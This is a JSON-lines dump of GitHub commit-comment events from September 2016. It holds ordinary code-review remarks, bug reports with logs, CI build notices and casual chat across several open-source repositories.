{"id":"4618316486","type":"CommitCommentEvent","actor":{"login":"pkesseli"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19173825,"position":11,"line":47,"path":"src/java_bytecode/java_local_variable_table.cpp","commit_id":"924342b7474793c5575e18edae6657b93c385aa8","created_at":"2016-09-26T14:55:38Z","updated_at":"2016-09-26T14:55:38Z","body":"`auto succit=std::next(findit);  // C++11`"}},"created_at":"2016-09-26T14:55:38Z"}
{"id":"4618316845","type":"CommitCommentEvent","actor":{"login":"ccpp"},"repo":{"name":"ccpp/be_secure_pw"},"payload":{"comment":{"id":19173826,"position":null,"line":null,"path":null,"commit_id":"368bb2e605629817fbf0fe1c0e4c9f1b8905e123","created_at":"2016-09-26T14:55:42Z","updated_at":"2016-09-26T14:55:42Z","body":"Hi, thanks.\r\nThe code has not been tested on TYPO3 >6.2 yet, but most of the SC_OPTIONS might have stayed the same... In the meantime, \"XCLASS\" should be migrated to TYPO3_CONF_VARS[SYS][Objects] - but according to the docs the old way is still supported..."}},"created_at":"2016-09-26T14:55:42Z"}
{"id":"4618319602","type":"CommitCommentEvent","actor":{"login":"pkesseli"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19173835,"position":11,"line":47,"path":"src/java_bytecode/java_local_variable_table.cpp","commit_id":"924342b7474793c5575e18edae6657b93c385aa8","created_at":"2016-09-26T14:56:07Z","updated_at":"2016-09-26T14:56:07Z","body":"`auto succit=std::next(findit);  // C++11`"}},"created_at":"2016-09-26T14:56:07Z"}
{"id":"4618322675","type":"CommitCommentEvent","actor":{"login":"pkesseli"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19173843,"position":12,"line":48,"path":"src/java_bytecode/java_local_variable_table.cpp","commit_id":"924342b7474793c5575e18edae6657b93c385aa8","created_at":"2016-09-26T14:56:32Z","updated_at":"2016-09-26T14:56:32Z","body":"Remove"}},"created_at":"2016-09-26T14:56:32Z"}
{"id":"4618323023","type":"CommitCommentEvent","actor":{"login":"dweinstein"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":19173844,"position":5,"line":8,"path":"binr/radare2/Makefile","commit_id":"c2c0e37e9538107ec53779ad4388f527ac71201c","created_at":"2016-09-26T14:56:34Z","updated_at":"2016-09-26T14:56:34Z","body":"👍 "}},"created_at":"2016-09-26T14:56:34Z"}
{"id":"4618324060","type":"CommitCommentEvent","actor":{"login":"ghikya"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19173847,"position":null,"line":null,"path":null,"commit_id":"be9995bd1e1190321969c89e2bbc5914a19a8f41","created_at":"2016-09-26T14:56:43Z","updated_at":"2016-09-26T14:56:43Z","body":"Sorry for dumb question, but is there a way to make Ratchet & Clank engine think that it's on higher LOD level so that it would exclude mip mapping at all? So long waiting for this game to be fixed, sadly software mode is too poor in performance/quality."}},"created_at":"2016-09-26T14:56:43Z"}
{"id":"4618329519","type":"CommitCommentEvent","actor":{"login":"lgrahl"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19173867,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-26T14:57:32Z","updated_at":"2016-09-26T14:57:32Z","body":"Updated in 5bbc74a8b5494e03c5d9182a7270058598439908"}},"created_at":"2016-09-26T14:57:32Z"}
{"id":"4618330788","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19173869,"position":null,"line":null,"path":null,"commit_id":"380c1dbe5d9f9dd19a71b40a2c1b0ba98225d32e","created_at":"2016-09-26T14:57:42Z","updated_at":"2016-09-26T14:57:42Z","body":"我日啊你别写了，我先merge一下，刚merge完之前的你又push一下，给我造成一万点伤害"}},"created_at":"2016-09-26T14:57:42Z"}
{"id":"4618339114","type":"CommitCommentEvent","actor":{"login":"zuowenjian"},"repo":{"name":"zhangliang-zl/plato_api"},"payload":{"comment":{"id":19173892,"position":null,"line":null,"path":null,"commit_id":"0a78afcd379727b3680a30b31b88954183854457","created_at":"2016-09-26T14:58:55Z","updated_at":"2016-09-26T14:58:55Z","body":"前端也可以放在一个项目里搞"}},"created_at":"2016-09-26T14:58:55Z"}
{"id":"4618341524","type":"CommitCommentEvent","actor":{"login":"bd-arc"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19173898,"position":null,"line":null,"path":null,"commit_id":"38979f9c68bd054aca3c6102635b2005914506b1","created_at":"2016-09-26T14:59:14Z","updated_at":"2016-09-26T14:59:14Z","body":"@hedgerwang @lsps9150414 Unfortunately, I can confirm what @chirag04 mentioned. Scene's absolute positioning is a no-go on Android because of all the z-index issues: the scenes will remain on top of the header, meaning the latter will be invisible. (It can however be managed on iOS with some negative top margin).\r\n\r\nIs there a workaround to create transparent headers on Android? Or are we stuck with plain ones?"}},"created_at":"2016-09-26T14:59:14Z"}
{"id":"4618344172","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19173906,"position":null,"line":null,"path":null,"commit_id":"8ac5bc16184f3bc1a265517cc7d3d3f22737fdcf","created_at":"2016-09-26T14:59:39Z","updated_at":"2016-09-26T14:59:39Z","body":"我在试着用WPF重写Game部分，然而发现原来的ColorResource和ImageObject也得改。。。"}},"created_at":"2016-09-26T14:59:39Z"}
{"id":"4618344522","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19173907,"position":332,"line":292,"path":"views/list.html","commit_id":"6abae9f67cdb3fccd1f8d654f6c99e78d3db16b2","created_at":"2016-09-26T14:59:42Z","updated_at":"2016-09-26T14:59:42Z","body":"J'ai l'impression qu'il y a un `div` superflu."}},"created_at":"2016-09-26T14:59:42Z"}
{"id":"4618345052","type":"CommitCommentEvent","actor":{"login":"ex00"},"repo":{"name":"kirill-morozov-epam/flink"},"payload":{"comment":{"id":19173910,"position":5,"line":86,"path":"flink-java/pom.xml","commit_id":"c958cd1f31beb04e730eb546cd66d186f8a4a031","created_at":"2016-09-26T14:59:46Z","updated_at":"2016-09-26T14:59:46Z","body":"please return default value"}},"created_at":"2016-09-26T14:59:46Z"}
{"id":"4618355058","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19173935,"position":null,"line":null,"path":null,"commit_id":"380c1dbe5d9f9dd19a71b40a2c1b0ba98225d32e","created_at":"2016-09-26T15:01:12Z","updated_at":"2016-09-26T15:01:12Z","body":"哈哈哈哈哈我睡觉了 明天还得上班"}},"created_at":"2016-09-26T15:01:12Z"}
{"id":"4618358296","type":"CommitCommentEvent","actor":{"login":"NearTan"},"repo":{"name":"LCTT/TranslateProject"},"payload":{"comment":{"id":19173947,"position":null,"line":null,"path":null,"commit_id":"582fce7337f67cb028f83c9c3d6667bd68a3d048","created_at":"2016-09-26T15:01:40Z","updated_at":"2016-09-26T15:01:40Z","body":"谢谢组长\n\n2016-09-26 22:22 GMT+08:00 Xingyu.Wang <notifications@github.com>:\n\n> PUB:20160813 Journey-to-HTTP2\n>\n> @NearTan 翻译的不错！\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/LCTT/TranslateProject/commit/\n> 582fce7337f67cb028f83c9c3d6667bd68a3d048\n"}},"created_at":"2016-09-26T15:01:40Z"}
{"id":"4618360597","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19173954,"position":null,"line":null,"path":null,"commit_id":"38979f9c68bd054aca3c6102635b2005914506b1","created_at":"2016-09-26T15:01:59Z","updated_at":"2016-09-26T15:01:59Z","body":"@bd-arc You can pass `style={{ position: 'absolute' }}` I believe. And React Native has `zIndex` now, so you should be able to render it on top of the scene. Another trick is to use `elevation`. Higher elevation works like higher `zIndex` on Android."}},"created_at":"2016-09-26T15:01:59Z"}
{"id":"4618362646","type":"CommitCommentEvent","actor":{"login":"julbra"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19173961,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-26T15:02:19Z","updated_at":"2016-09-26T15:02:19Z","body":"@chimurai I created a minimal project that reproduces the bug:\r\n\r\nClone from https://github.com/julbra/http-proxy-middleware-leak-test.git\r\nnpm install then run gulp\r\nwget http://localhost:3100/ 10 times\r\nAfter the 10th wget I get the warning.\r\n```\r\njulien ~/workspace/http-proxy-middleware-leak-test (master=) $ gulp\r\n[15:58:37] Using gulpfile ~/workspace/http-proxy-middleware-leak-test/gulpfile.js\r\nExample server listening on port 3000\r\n[15:58:37] Starting 'default'...\r\n[HPM] Proxy created: /  ->  http://localhost:3000\r\n[HPM] Subscribed to http-proxy events:  [ 'error', 'close' ]\r\n[BS] Access URLs:\r\n -------------------------------------\r\n       Local: http://localhost:3100\r\n    External: http://16.25.175.49:3100\r\n -------------------------------------\r\n          UI: http://localhost:3001\r\n UI External: http://16.25.175.49:3001\r\n -------------------------------------\r\n[BS] Serving files from: .\r\n[15:58:37] Finished 'default' after 76 ms\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n[HPM] GET / -> http://localhost:3000\r\n(node) warning: possible EventEmitter memory leak detected. 11 upgrade listeners added. Use emitter.setMaxListeners() to increase limit.\r\nTrace\r\n    at Server.addListener (events.js:252:17)\r\n    at catchUpgradeRequest (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/http-proxy-middleware/lib/index.js:51:16)\r\n    at middleware (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/http-proxy-middleware/lib/index.js:46:13)\r\n    at call (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/connect/index.js:239:7)\r\n    at next (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/connect/index.js:183:5)\r\n    at next (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/connect/index.js:161:14)\r\n    at next (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/connect/index.js:161:14)\r\n    at respModifierMiddleware (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/resp-modifier/index.js:80:9)\r\n    at call (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/connect/index.js:239:7)\r\n    at next (/home/julien/workspace/http-proxy-middleware-leak-test/node_modules/connect/index.js:183:5)\r\n```"}},"created_at":"2016-09-26T15:02:19Z"}
{"id":"4618363370","type":"CommitCommentEvent","actor":{"login":"pietbrauer"},"repo":{"name":"nerdishbynature/git2go-translation"},"payload":{"comment":{"id":19173964,"position":6,"line":194,"path":"ja.lproj/Localizable.strings","commit_id":"d5727286895e718cd904a33c118be9934ffe0018","created_at":"2016-09-26T15:02:25Z","updated_at":"2016-09-26T15:02:25Z","body":"@pixyzehn Do you think you could take a look at that 😬"}},"created_at":"2016-09-26T15:02:25Z"}
{"id":"4618365145","type":"CommitCommentEvent","actor":{"login":"menshiyun"},"repo":{"name":"iceman1001/proxmark3"},"payload":{"comment":{"id":19173969,"position":null,"line":null,"path":null,"commit_id":"c3b6fdfa5b30ad77457a2bae99db69bcd09e2968","created_at":"2016-09-26T15:02:43Z","updated_at":"2016-09-26T15:02:43Z","body":"perl in proxspace can't use POSIX.pm package. Proxspace is really too old.\r\nI can't help it. I will try to get them to compile under msys2."}},"created_at":"2016-09-26T15:02:43Z"}
{"id":"4618369823","type":"CommitCommentEvent","actor":{"login":"m-kostrzewa"},"repo":{"name":"m-kostrzewa/gohan"},"payload":{"comment":{"id":19173978,"position":18,"line":226,"path":"server/api.go","commit_id":"b6a6016a1dde1db9a3150b8a4db84beb3adab1da","created_at":"2016-09-26T15:03:28Z","updated_at":"2016-09-26T15:03:28Z","body":"Forgot w.Header().Add(\"Etag\", calculateResponseEtag(context)) here"}},"created_at":"2016-09-26T15:03:28Z"}
{"id":"4618371849","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19173983,"position":null,"line":null,"path":null,"commit_id":"a612e2d863f46c3a0a28dacc06fb4d859f3c8c8c","created_at":"2016-09-26T15:03:48Z","updated_at":"2016-09-26T15:03:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1166](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14269&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T15:03:48Z"}
{"id":"4618378501","type":"CommitCommentEvent","actor":{"login":"GarethOates"},"repo":{"name":"duffers20/Angular2-Template"},"payload":{"comment":{"id":19173999,"position":null,"line":null,"path":null,"commit_id":"46b30c166b7a260ab79da25c913ce1298e60642b","created_at":"2016-09-26T15:04:52Z","updated_at":"2016-09-26T15:04:52Z","body":"Wonderful indeed! 👍🏻"}},"created_at":"2016-09-26T15:04:52Z"}
{"id":"4618384618","type":"CommitCommentEvent","actor":{"login":"slytomcat"},"repo":{"name":"karlicoss/yandex-disk-indicator"},"payload":{"comment":{"id":19174019,"position":null,"line":null,"path":null,"commit_id":"e0a877375daf9446572f4c05e085b41abc8dad92","created_at":"2016-09-26T15:05:47Z","updated_at":"2016-09-26T15:05:47Z","body":"BTW as you placed restart button on daemon config tab it seems that you have to save config and reload only that daemon that is configured on this tab (not all of them)."}},"created_at":"2016-09-26T15:05:47Z"}
{"id":"4618390001","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174031,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:06:38Z","updated_at":"2016-09-26T15:06:38Z","body":"@zacharyacutey SPAM. Yah, I did it."}},"created_at":"2016-09-26T15:06:38Z"}
{"id":"4618392800","type":"CommitCommentEvent","actor":{"login":"pkesseli"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19174037,"position":5,"line":91,"path":"src/java_bytecode/java_bytecode_parse_tree.h","commit_id":"e5d4276447dc658607becf629a88a294ef393707","created_at":"2016-09-26T15:07:01Z","updated_at":"2016-09-26T15:07:01Z","body":"I think Daniel doesn't like \"struct\" ;-) .\r\nclass exceptiont\r\n{\r\npublic:"}},"created_at":"2016-09-26T15:07:01Z"}
{"id":"4618393876","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174039,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:11Z","updated_at":"2016-09-26T15:07:11Z","body":"@zacharyacutey SPAM.\r\n"}},"created_at":"2016-09-26T15:07:11Z"}
{"id":"4618394171","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174041,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:13Z","updated_at":"2016-09-26T15:07:13Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:13Z"}
{"id":"4618394335","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174042,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:14Z","updated_at":"2016-09-26T15:07:14Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:14Z"}
{"id":"4618394473","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174043,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:15Z","updated_at":"2016-09-26T15:07:15Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:15Z"}
{"id":"4618394604","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174044,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:17Z","updated_at":"2016-09-26T15:07:17Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:17Z"}
{"id":"4618394757","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174045,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:18Z","updated_at":"2016-09-26T15:07:18Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:18Z"}
{"id":"4618394934","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174047,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:19Z","updated_at":"2016-09-26T15:07:19Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:19Z"}
{"id":"4618395066","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174049,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:20Z","updated_at":"2016-09-26T15:07:20Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:20Z"}
{"id":"4618395175","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174050,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:22Z","updated_at":"2016-09-26T15:07:22Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:22Z"}
{"id":"4618395314","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174052,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:23Z","updated_at":"2016-09-26T15:07:23Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:23Z"}
{"id":"4618395513","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174053,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:24Z","updated_at":"2016-09-26T15:07:24Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:24Z"}
{"id":"4618395769","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174055,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:26Z","updated_at":"2016-09-26T15:07:26Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:26Z"}
{"id":"4618395890","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174056,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:28Z","updated_at":"2016-09-26T15:07:28Z","body":"@zacharyacutey SPAM."}},"created_at":"2016-09-26T15:07:28Z"}
{"id":"4618396798","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19174059,"position":null,"line":null,"path":null,"commit_id":"7a51952671c8ea8c7463240d30901685e0597783","created_at":"2016-09-26T15:07:36Z","updated_at":"2016-09-26T15:07:36Z","body":"@zacharyacutey Ha"}},"created_at":"2016-09-26T15:07:36Z"}
{"id":"4618397645","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19174060,"position":null,"line":null,"path":null,"commit_id":"380c1dbe5d9f9dd19a71b40a2c1b0ba98225d32e","created_at":"2016-09-26T15:07:45Z","updated_at":"2016-09-26T15:07:45Z","body":"加油喔。 😆 "}},"created_at":"2016-09-26T15:07:45Z"}
{"id":"4618406253","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19174076,"position":null,"line":null,"path":null,"commit_id":"8ac5bc16184f3bc1a265517cc7d3d3f22737fdcf","created_at":"2016-09-26T15:08:59Z","updated_at":"2016-09-26T15:08:59Z","body":"那就写个WPFColorResource这种的吧。然后再给ColorResource加个ToWPFColorResource这种方法。\r\n今天我同学也给我安利WPF了 Orz 😂 "}},"created_at":"2016-09-26T15:08:59Z"}
{"id":"4618409490","type":"CommitCommentEvent","actor":{"login":"sorin-pascu"},"repo":{"name":"Appstam/R_appstamDC"},"payload":{"comment":{"id":19174085,"position":null,"line":null,"path":null,"commit_id":"c7510c5cceb0395064cf94c2c81aed832588b47c","created_at":"2016-09-26T15:09:28Z","updated_at":"2016-09-26T15:09:28Z","body":"spar folders"}},"created_at":"2016-09-26T15:09:28Z"}
{"id":"4618412394","type":"CommitCommentEvent","actor":{"login":"bositman"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19174089,"position":null,"line":null,"path":null,"commit_id":"be9995bd1e1190321969c89e2bbc5914a19a8f41","created_at":"2016-09-26T15:09:55Z","updated_at":"2016-09-26T15:09:55Z","body":"MipMapping is almost perfect now anyway so why do that?\r\n@gregory38  Got a crash again with Ratchet and Clank 3 even with this change :/"}},"created_at":"2016-09-26T15:09:55Z"}
{"id":"4618412569","type":"CommitCommentEvent","actor":{"login":"catkar"},"repo":{"name":"catkar/hello-world"},"payload":{"comment":{"id":19174090,"position":null,"line":null,"path":null,"commit_id":"f6fe955e377fcf1ed4c1791ac1a240eb764eae06","created_at":"2016-09-26T15:09:57Z","updated_at":"2016-09-26T15:09:57Z","body":"hi cat"}},"created_at":"2016-09-26T15:09:57Z"}
{"id":"4618413203","type":"CommitCommentEvent","actor":{"login":"mavam"},"repo":{"name":"actor-framework/actor-framework"},"payload":{"comment":{"id":19174091,"position":4,"line":53,"path":"configure","commit_id":"927542f62e12a53cf8e4f1bc1e3a674c8f9eab9e","created_at":"2016-09-26T15:10:04Z","updated_at":"2016-09-26T15:10:04Z","body":"What's the difference between this and the above setting? This seems confusing from a user perspective."}},"created_at":"2016-09-26T15:10:04Z"}
{"id":"4618417183","type":"CommitCommentEvent","actor":{"login":"kunagrawal"},"repo":{"name":"kunagrawal/customer_identification"},"payload":{"comment":{"id":19174098,"position":null,"line":null,"path":null,"commit_id":"fed9f54c2298acd469c4f1b49d708994836d50d1","created_at":"2016-09-26T15:10:40Z","updated_at":"2016-09-26T15:10:40Z","body":"Customer Analytics\r\n================\r\n\r\nCustomer Analytics with R\r\n\r\nThis is a repository of R links for analyzing customer data.\r\n\r\nScripts\r\n\r\n - Setup environment\r\n - Cohort Analysis\r\n - Shopping Cart Analysis\r\n - Customer Segmentation\r\n\r\n\r\nLink\r\n - [Using R for Customer Analytics] \r\n\r\nPackages\r\n\r\n - [BTYD: Implementing Buy 'Til You Die Models](http://cran.r-project.org/web/packages/BTYD/)\r\n - [BCA: Business and Customer Analytics](http://cran.r-project.org/web/packages/BCA/) \r\n\r\n"}},"created_at":"2016-09-26T15:10:40Z"}
{"id":"4618427323","type":"CommitCommentEvent","actor":{"login":"Neverlord"},"repo":{"name":"actor-framework/actor-framework"},"payload":{"comment":{"id":19174127,"position":4,"line":53,"path":"configure","commit_id":"927542f62e12a53cf8e4f1bc1e3a674c8f9eab9e","created_at":"2016-09-26T15:12:14Z","updated_at":"2016-09-26T15:12:14Z","body":"True, description isn't good. The `--no-exceptions` flag simply removes all `try/catch` blocks in CAF."}},"created_at":"2016-09-26T15:12:14Z"}
{"id":"4618430719","type":"CommitCommentEvent","actor":{"login":"pixyzehn"},"repo":{"name":"nerdishbynature/git2go-translation"},"payload":{"comment":{"id":19174137,"position":6,"line":194,"path":"ja.lproj/Localizable.strings","commit_id":"d5727286895e718cd904a33c118be9934ffe0018","created_at":"2016-09-26T15:12:48Z","updated_at":"2016-09-26T15:12:48Z","body":"Sure:)"}},"created_at":"2016-09-26T15:12:48Z"}
{"id":"4618434020","type":"CommitCommentEvent","actor":{"login":"ameihm0912"},"repo":{"name":"gdestuynder/rra2json"},"payload":{"comment":{"id":19174141,"position":null,"line":null,"path":null,"commit_id":"3ea3d7d6865e2d7c7fd3d44b40e2b27e8930d910","created_at":"2016-09-26T15:13:20Z","updated_at":"2016-09-26T15:13:20Z","body":"No problem"}},"created_at":"2016-09-26T15:13:20Z"}
{"id":"4618434856","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"ueyudiud/FLE"},"payload":{"comment":{"id":19174143,"position":6,"line":6,"path":"src/main/java/farcore/lib/collection/IteratorList.java","commit_id":"14ca91bc93f37aacce0bc0b2662d254f06fdc0a6","created_at":"2016-09-26T15:13:30Z","updated_at":"2016-09-26T15:13:30Z","body":"`IteratorArray`?"}},"created_at":"2016-09-26T15:13:30Z"}
{"id":"4618436230","type":"CommitCommentEvent","actor":{"login":"iceman1001"},"repo":{"name":"iceman1001/proxmark3"},"payload":{"comment":{"id":19174147,"position":null,"line":null,"path":null,"commit_id":"c3b6fdfa5b30ad77457a2bae99db69bcd09e2968","created_at":"2016-09-26T15:13:41Z","updated_at":"2016-09-26T15:13:41Z","body":"This update from @osysltd makes a cleaner mingw env in windows.\r\nhttps://github.com/iceman1001/proxmark3/commit/9b8fb1da6696a29c6b792b1c4def2ea694fafde6"}},"created_at":"2016-09-26T15:13:41Z"}
{"id":"4618436410","type":"CommitCommentEvent","actor":{"login":"pkesseli"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19174148,"position":37,"line":45,"path":"src/java_bytecode/java_local_variable_table.cpp","commit_id":"d07cbe6b7bd028ae9845ef1ff42d4551fabf472c","created_at":"2016-09-26T15:13:43Z","updated_at":"2016-09-26T15:13:43Z","body":"{ return args.second.rbegin()->first; }"}},"created_at":"2016-09-26T15:13:43Z"}
{"id":"4618442799","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19174164,"position":null,"line":null,"path":null,"commit_id":"a612e2d863f46c3a0a28dacc06fb4d859f3c8c8c","created_at":"2016-09-26T15:14:44Z","updated_at":"2016-09-26T15:14:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1166](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14269&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:10:56"}},"created_at":"2016-09-26T15:14:44Z"}
{"id":"4618444726","type":"CommitCommentEvent","actor":{"login":"bloatware"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19174169,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-26T15:15:01Z","updated_at":"2016-09-26T15:15:01Z","body":"Replacing `file_exists($file)` with `is_writable(txpath.DS.'..') && is_writable($file)` seems to fix it for me."}},"created_at":"2016-09-26T15:15:01Z"}
{"id":"4618455288","type":"CommitCommentEvent","actor":{"login":"julbra"},"repo":{"name":"chimurai/http-proxy-middleware"},"payload":{"comment":{"id":19174193,"position":null,"line":null,"path":null,"commit_id":"53fe79b6c36ca4034c3fd68ffb29bcc81d84e576","created_at":"2016-09-26T15:16:39Z","updated_at":"2016-09-26T15:16:39Z","body":"@chimurai I updated https://github.com/julbra/http-proxy-middleware-leak-test with an express only task.\r\nThe same bug is also found there without browser-sync involved."}},"created_at":"2016-09-26T15:16:39Z"}
{"id":"4618455378","type":"CommitCommentEvent","actor":{"login":"kreeger"},"repo":{"name":"ovenbits/ModelRocket"},"payload":{"comment":{"id":19174194,"position":8,"line":31,"path":"Sources/JSONTransformable.swift","commit_id":"a238a56d1ea5b24db7d573d2a4382a8890f01165","created_at":"2016-09-26T15:16:40Z","updated_at":"2016-09-26T15:16:40Z","body":"What was the reasoning for moving away from `associatedtype` here? This is throwing off upgrading a few `Model` subclasses of mine where I'm returning a subclass of `T` based on the `json` fed in here. I'm getting a `Method from(json:) in non-final class NameOfClass must return Self to conform to protocol JSONTransformable`."}},"created_at":"2016-09-26T15:16:40Z"}
